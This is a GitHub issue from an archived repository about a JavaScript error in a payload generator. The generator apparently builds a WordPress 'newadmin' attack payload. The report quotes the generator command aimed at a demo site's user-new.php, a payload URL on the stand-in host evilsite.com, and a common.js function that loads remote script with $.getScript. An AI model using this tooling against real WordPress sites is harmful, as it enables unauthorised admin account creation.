You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Feb 9, 2022. It is now read-only.
When I run the following:
./bin/genpayload.py -p wordpress/newadmin -t swf -P usernewpage=http://demosite.com/wordpress-3.2.1/wp-admin/user-new.php -o /var/www/wordpress_newadmin/
And then browse to the generated payload:
http://evilsite.com/wordpress_newadmin/index.html
I get the following JavaScript error message in the console:
ReferenceError: statusurl is not defined
if (statusurl.length > 0)
The bug seems to be in common.js:
function notify(status)
{
if (statusurl.length > 0)
{
nstatusurl = statusurl + '?status=' + escape(status);
$.getScript(nstatusurl);
}
};
The text was updated successfully, but these errors were encountered: